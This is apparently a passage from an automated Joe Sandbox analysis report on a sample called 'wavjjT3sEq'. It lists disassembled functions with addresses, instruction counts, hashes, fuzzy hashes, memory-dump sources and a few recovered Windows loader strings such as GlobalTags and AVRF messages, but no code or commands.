                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1605402377.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_120000_wavjjT3sEq.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: [!
                                                                                                                                                              • API String ID: 0-1426032190
                                                                                                                                                              • Opcode ID: 62d0f287db2433311209321978f1c917ed684eb54aa7da3129dde13f760a464f
                                                                                                                                                              • Instruction ID: 71561f27c298ee64781320b37e90341b03d85b9e5658ed59a5a88d89cb06d545
                                                                                                                                                              • Opcode Fuzzy Hash: 62d0f287db2433311209321978f1c917ed684eb54aa7da3129dde13f760a464f
                                                                                                                                                              • Instruction Fuzzy Hash: AC71F331B004255BDF2C8D5DEC616BDB392E7A4314F18913DD916CBBD0E739AD618680
                                                                                                                                                              Function 0195A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: GlobalTags
                                                                                                                                                              • API String ID: 0-1106856819
                                                                                                                                                              • Opcode ID: 2223ca7e834c1a19104d23a754c7a17aca67778ba6960a634a0dabd2ac911ee5
                                                                                                                                                              • Instruction ID: 1b38fbd55edf5254e1260191aa135ad1e8456824772de97618bc6e5c331babf7
                                                                                                                                                              • Opcode Fuzzy Hash: 2223ca7e834c1a19104d23a754c7a17aca67778ba6960a634a0dabd2ac911ee5
                                                                                                                                                              • Instruction Fuzzy Hash: 91718275E0030ADFDF28CF9DD590AADBBB5BF88701F14852EE909AB241E7319941CB60
                                                                                                                                                              Function 00122400 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1605402377.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_120000_wavjjT3sEq.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: VUUU
                                                                                                                                                              • API String ID: 0-2040033107
                                                                                                                                                              • Opcode ID: a50dfdd5af62605cdd7c64c27cf8f5a04538f92f61f56a11ed0010e54a24ba07
                                                                                                                                                              • Instruction ID: 353a3a8d302958af2b1a20f6da26c36c28063e50a6128c2f09155e462ffd2c4d
                                                                                                                                                              • Opcode Fuzzy Hash: a50dfdd5af62605cdd7c64c27cf8f5a04538f92f61f56a11ed0010e54a24ba07
                                                                                                                                                              • Instruction Fuzzy Hash: B6415E62B4006927DB2C481DFC702FD6693D3E4315B59D23AD886CF7D8EB74AD629340
                                                                                                                                                              Function 019C4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: .mui
                                                                                                                                                              • API String ID: 0-1199573805
                                                                                                                                                              • Opcode ID: b71a324766a22466bcd36682701b56d31622043fe7198683109dea4a9ee12ce9
                                                                                                                                                              • Instruction ID: 4f513e71bec524b2820dee9799eb25463b8ae4b6ce39d74d90b7895c24a881d3
                                                                                                                                                              • Opcode Fuzzy Hash: b71a324766a22466bcd36682701b56d31622043fe7198683109dea4a9ee12ce9
                                                                                                                                                              • Instruction Fuzzy Hash: 7B519172E0022ADFDF10DF99D850EAEBBB8AF44F50F05412DEA59BB244D3349901CBA5
                                                                                                                                                              Function 0193E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: EXT-
                                                                                                                                                              • API String ID: 0-1948896318
                                                                                                                                                              • Opcode ID: de7937174e64069d93a65b50b9ab87c7fb2ec688e95bf35af917b3d9e5c94268
                                                                                                                                                              • Instruction ID: d2258577c478e36fccfae1ad2fe0f5b9c2e9eab229f1e24ea28dece1815f98ff
                                                                                                                                                              • Opcode Fuzzy Hash: de7937174e64069d93a65b50b9ab87c7fb2ec688e95bf35af917b3d9e5c94268
                                                                                                                                                              • Instruction Fuzzy Hash: 11418072508346ABD722DA75C880FABB7ECAFC8714F44092DFA8DD7180E674DA04C796
                                                                                                                                                              Function 0199C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: BinaryHash
                                                                                                                                                              • API String ID: 0-2202222882
                                                                                                                                                              • Opcode ID: cbc6312bb4e72247c0f3061148fedb022604477648a86640751d65dfceba604f
                                                                                                                                                              • Instruction ID: 342945721f9d929766314de3d3b8a6b966cfa8ad2b2c64b92a6e2c213b69433b
                                                                                                                                                              • Opcode Fuzzy Hash: cbc6312bb4e72247c0f3061148fedb022604477648a86640751d65dfceba604f
                                                                                                                                                              • Instruction Fuzzy Hash: 4C414FB1D0022DAFDF21DB64CC84FDEB77CAB85714F0045A5AA0CAB140DB709E898FA5
                                                                                                                                                              Function 019B6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: #
                                                                                                                                                              • API String ID: 0-1885708031
                                                                                                                                                              • Opcode ID: b37743291a6b5d1652cbe058964396956e5a1e5828943156cd02e27720d41a21
                                                                                                                                                              • Instruction ID: 8509a11e7c90f66a7c5d3fd461478a8cb8ec51bbc8265d804a286c23989912fc
                                                                                                                                                              • Opcode Fuzzy Hash: b37743291a6b5d1652cbe058964396956e5a1e5828943156cd02e27720d41a21
                                                                                                                                                              • Instruction Fuzzy Hash: 08310831E007199BEB22DB69C991BEE7BBCDF45704F144028EA49AB282D775FC05CB50
                                                                                                                                                              Function 0199CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: BinaryName
                                                                                                                                                              • API String ID: 0-215506332
                                                                                                                                                              • Opcode ID: d28071e9dcbcae80984b304669f15f5f2983477a4502b9e80877dfebac573181
                                                                                                                                                              • Instruction ID: fd16762bf426ead7166dd68f569b425624488c2b5c8f4cc020e9f4bad8f88894
                                                                                                                                                              • Opcode Fuzzy Hash: d28071e9dcbcae80984b304669f15f5f2983477a4502b9e80877dfebac573181
                                                                                                                                                              • Instruction Fuzzy Hash: AE31E33690151AAFEF16DB5DCC55E7FBBB8EB84760F014129A909A7290D730AE04DBE0
                                                                                                                                                              Function 019A892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 019A895E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                                              • API String ID: 0-702105204
                                                                                                                                                              • Opcode ID: b4258c0171550e8867b907b892812dcf31aa92f32df951dba2933cebe4392877
                                                                                                                                                              • Instruction ID: c432c760c7987b3d3df22dc1a1ad2777f7fddab6235a29fd4d1bf81e68c07135
                                                                                                                                                              • Opcode Fuzzy Hash: b4258c0171550e8867b907b892812dcf31aa92f32df951dba2933cebe4392877
                                                                                                                                                              • Instruction Fuzzy Hash: BE012B36600211AFE6216B59CC84E967F6AFFC6656F84042CF64D06555CB30688AC7D2
                                                                                                                                                              Function 0195E8F0 Relevance: 1.0, Instructions: 985COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 91fa50dd458813f88d287208b0dcbd09587f1f59f9bc16c6119ec7c54017498c
                                                                                                                                                              • Instruction ID: 4379d34ad426dcd312ea5ad75b4c9f37bf09c05da31c698a803d5f5beb76aa2f
                                                                                                                                                              • Opcode Fuzzy Hash: 91fa50dd458813f88d287208b0dcbd09587f1f59f9bc16c6119ec7c54017498c
                                                                                                                                                              • Instruction Fuzzy Hash: 5B822472F102188BCB58CFADDC916DDB7F2EF88314B19812DE41AEB345DA34AC568B45
                                                                                                                                                              Function 0196516C Relevance: .8, Instructions: 785COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 2c3e76bbd0bb32502e31831811fde7d84a39f168ff5afdb41113645c892d1a28
                                                                                                                                                              • Instruction ID: 4004d73cba9b4a1c3168bcdaab9653239f0d68b558f1ddf34dfa806355f9a045
                                                                                                                                                              • Opcode Fuzzy Hash: 2c3e76bbd0bb32502e31831811fde7d84a39f168ff5afdb41113645c892d1a28
                                                                                                                                                              • Instruction Fuzzy Hash: 4462B43290864A9FEF25CF18D4904AEFB7AFE51394B4AC65DC89E67604D330B944CBE1
                                                                                                                                                              Function 019C2000 Relevance: .8, Instructions: 757COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 58f16fbc3f3e9b03b10c62942ef89dedb3c9c693e7343a6c60ca41d0a6767381
                                                                                                                                                              • Instruction ID: d0feb11da6f173f9b965ae35cb28224121ddd6ae2babd69cd904f0b1c2c68594
                                                                                                                                                              • Opcode Fuzzy Hash: 58f16fbc3f3e9b03b10c62942ef89dedb3c9c693e7343a6c60ca41d0a6767381
                                                                                                                                                              • Instruction Fuzzy Hash: D842C1356083419BE725CF68C890A6BBBE9BFC8B40F48092DFACA97250D771D945CB53
                                                                                                                                                              Function 0197739A Relevance: .7, Instructions: 705COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: d26341d7bc20279da7dcf5fafadf75ef868b446f3d77486afa42ee907da2f34a
                                                                                                                                                              • Instruction ID: 56a85d9fdba9999747915b4a15e4ef0ed0c2373f522eb40d7d876d57c48f8dce
                                                                                                                                                              • Opcode Fuzzy Hash: d26341d7bc20279da7dcf5fafadf75ef868b446f3d77486afa42ee907da2f34a
                                                                                                                                                              • Instruction Fuzzy Hash: B842BE71A006168FDB19CF9DC884ABEBBF6FF88715B14856DD55AAB340D730E842CB90
                                                                                                                                                              Function 0194B2C0 Relevance: .6, Instructions: 629COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 444deaeb070e17442cbbe0d44f90f538e927224ae976b2f45f04cb3c573ad16c
                                                                                                                                                              • Instruction ID: 8b622deac799b1684996215072638d97daf9af2d359e270e99365df6a26d62f0
                                                                                                                                                              • Opcode Fuzzy Hash: 444deaeb070e17442cbbe0d44f90f538e927224ae976b2f45f04cb3c573ad16c
                                                                                                                                                              • Instruction Fuzzy Hash: E032B375E01219DBDF24DFA8D890FAEBBB5FF94714F180029E80AAB351E7359911CB90
                                                                                                                                                              Function 019B8158 Relevance: .6, Instructions: 617COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: eea966165ad826f411fe4a88e09fe3217c7f2a6b1654c924ef90d49e6c6f59e2
                                                                                                                                                              • Instruction ID: 762146d8e4ec7bddb2b231500e95478fb1c93f559a9ff86dafc5386d23505d92
                                                                                                                                                              • Opcode Fuzzy Hash: eea966165ad826f411fe4a88e09fe3217c7f2a6b1654c924ef90d49e6c6f59e2
                                                                                                                                                              • Instruction Fuzzy Hash: 23425C75E102199FEB24CF69C981BEDBBF9BF88301F148099E94DAB241D7349985CF50
                                                                                                                                                              Function 01932840 Relevance: .6, Instructions: 605COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: cf9a2615cb311457ece61da935b3d4957d1e53ba010573efca3fe1d8d2aa8a68
                                                                                                                                                              • Instruction ID: 7934d0c4b30540e5a0d983e8df1bc88ff33ac2060526a8a4bab95b429c9efc11
                                                                                                                                                              • Opcode Fuzzy Hash: cf9a2615cb311457ece61da935b3d4957d1e53ba010573efca3fe1d8d2aa8a68
                                                                                                                                                              • Instruction Fuzzy Hash: F432EC70A007558BEB25EF69C844BBEBBF6BF84705F24451DD58E9F284D735A802CB90
                                                                                                                                                              Function 019CA118 Relevance: .6, Instructions: 591COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 6f1e8a3d3e3bdac071bd5feb9394ed534b4c5ce70a05dda4c444e26ddb785004
                                                                                                                                                              • Instruction ID: 7d5a6d2e9a79005cece29ffff613995e287f951329a0e26cd523f7793ff0f5b3
                                                                                                                                                              • Opcode Fuzzy Hash: 6f1e8a3d3e3bdac071bd5feb9394ed534b4c5ce70a05dda4c444e26ddb785004
                                                                                                                                                              • Instruction Fuzzy Hash: CE22CE706046A98BEB25CF29C094776BBF5BF44B41F08885DD9CA8F286F335D452CB62
                                                                                                                                                              Function 019E16CC Relevance: .6, Instructions: 571COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: be34f388e0b9c88976f39f7e5b68e34f479b55b73d5ad07363e67cf49ffef44d
                                                                                                                                                              • Instruction ID: ff7eaa5236f0fc46d90d111f71bedbac26131ca0b7069b87175529294de50212
                                                                                                                                                              • Opcode Fuzzy Hash: be34f388e0b9c88976f39f7e5b68e34f479b55b73d5ad07363e67cf49ffef44d
                                                                                                                                                              • Instruction Fuzzy Hash: 7B22B035A002168FDB1ACF58C494ABEB7F6BF88305B28457DD959DB345DB30E942CB90
                                                                                                                                                              Function 0194FB80 Relevance: .6, Instructions: 559COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 7902d3215c451bb47ad09bf951ec368adb388cfe2c33150d3fb843cfe61decd2
                                                                                                                                                              • Instruction ID: 0472fbbfae4c3202ef97bd27a0b5aa873f89f954c1f40bc411b02e8b65efc323
                                                                                                                                                              • Opcode Fuzzy Hash: 7902d3215c451bb47ad09bf951ec368adb388cfe2c33150d3fb843cfe61decd2
                                                                                                                                                              • Instruction Fuzzy Hash: BA22A475D0020A9FDF15DFACC880BAEB7B9FF84311F184569E9299B245E730EA45CB90
                                                                                                                                                              Function 01948DBF Relevance: .6, Instructions: 554COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: f0e872b02877bdd083c9b8065885d546f5883ffbf2697cecf6c9b2b81f00473a
                                                                                                                                                              • Instruction ID: c3eee42fb95d7d1532669d4d10d9e320636e01c6a13f327d0e313cecb8cd9b16
                                                                                                                                                              • Opcode Fuzzy Hash: f0e872b02877bdd083c9b8065885d546f5883ffbf2697cecf6c9b2b81f00473a
                                                                                                                                                              • Instruction Fuzzy Hash: 39225270E0021ADBDF15DF99C4809BEFBF6BF88715B14845AE9499B281E734ED41CBA0
                                                                                                                                                              Function 01926A50 Relevance: .5, Instructions: 548COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: a0ec9fa644c1ff4450d4d2ebfb490ddb1c28768a924782faf9871f39ef661a2b
                                                                                                                                                              • Instruction ID: 09edf13ea73dbc869a84c0234dc51d81a494586384c83b675563206b7cb4491f
                                                                                                                                                              • Opcode Fuzzy Hash: a0ec9fa644c1ff4450d4d2ebfb490ddb1c28768a924782faf9871f39ef661a2b
                                                                                                                                                              • Instruction Fuzzy Hash: 0632B071A04215CFDB25DF68C480BAEBBF5FF88300F14896AE95AAB755D734E842CB50
                                                                                                                                                              Function 019E2446 Relevance: .5, Instructions: 485COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: f3088e50f0bd6433e579bfa2c8bea03c783c3d2a412ce6f0dd6e7f9b948ddbb8
                                                                                                                                                              • Instruction ID: 8ef7254cf25c5f7740ef9b7667faef055bccb1306b296dc70ba38dbe928d9221
                                                                                                                                                              • Opcode Fuzzy Hash: f3088e50f0bd6433e579bfa2c8bea03c783c3d2a412ce6f0dd6e7f9b948ddbb8
                                                                                                                                                              • Instruction Fuzzy Hash: 080234346046518BEB26CF2DC558775BBF9BF84301B18859AE8DECF282D735E842DB20
                                                                                                                                                              Function 019E41A2 Relevance: .5, Instructions: 452COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 9d9c9734f6a9aa996b5e121bdd517c1f7c0b73fcdd876e1c46bac45c1e29d50e
                                                                                                                                                              • Instruction ID: bc49e41274089edfde2599776f423ba912f3075f1acc9551b7f8e168916743cf
                                                                                                                                                              • Opcode Fuzzy Hash: 9d9c9734f6a9aa996b5e121bdd517c1f7c0b73fcdd876e1c46bac45c1e29d50e
                                                                                                                                                              • Instruction Fuzzy Hash: 4F026D71E00216CBCB16CF98C4846ADBBF2FF98304F298569D55AEB755E730A942CF50
                                                                                                                                                              Function 019FB16B Relevance: .4, Instructions: 450COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: b3bddb1e4a3e191996e07417f150acb7ed53b8bd56e6c31a020b81860024367b
                                                                                                                                                              • Instruction ID: 00a770d10e96db96923c5c408ac99f5d018aee14ded5c1dec361e828588f32b5
                                                                                                                                                              • Opcode Fuzzy Hash: b3bddb1e4a3e191996e07417f150acb7ed53b8bd56e6c31a020b81860024367b
                                                                                                                                                              • Instruction Fuzzy Hash: 12F11672E00215ABDB18CF6CC9A06BEFBF5EF98210719416DD95BDB381E634EA01CB50
                                                                                                                                                              Function 00130293 Relevance: .4, Instructions: 435COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1605402377.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_120000_wavjjT3sEq.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                                                              • Instruction ID: 9bd6c177da88bc170cd2800cc23164c25b069a2945d2253e5c4653c31ed379cf
                                                                                                                                                              • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                                                              • Instruction Fuzzy Hash: 74026E73E547164FE720DE4ACDC4765B3A3EFC8311F5B81B8CA142B613CA39BA525A90
                                                                                                                                                              Function 019FA9A6 Relevance: .4, Instructions: 425COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: d33491591c4c9c03f447b4ba9ccb5743b62ffef706a89195ef4b70e03db6ce25
                                                                                                                                                              • Instruction ID: 81184b6dc0a383aeeb928050345202c840b1ea801dbe60e72795167d95a0c8fb
                                                                                                                                                              • Opcode Fuzzy Hash: d33491591c4c9c03f447b4ba9ccb5743b62ffef706a89195ef4b70e03db6ce25
                                                                                                                                                              • Instruction Fuzzy Hash: F5F1D372E00526ABCB19CEA8C5A05BDFBF5AF54211B19426DD95EEB380D734EE40CB90
                                                                                                                                                              Function 01944A35 Relevance: .4, Instructions: 423COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
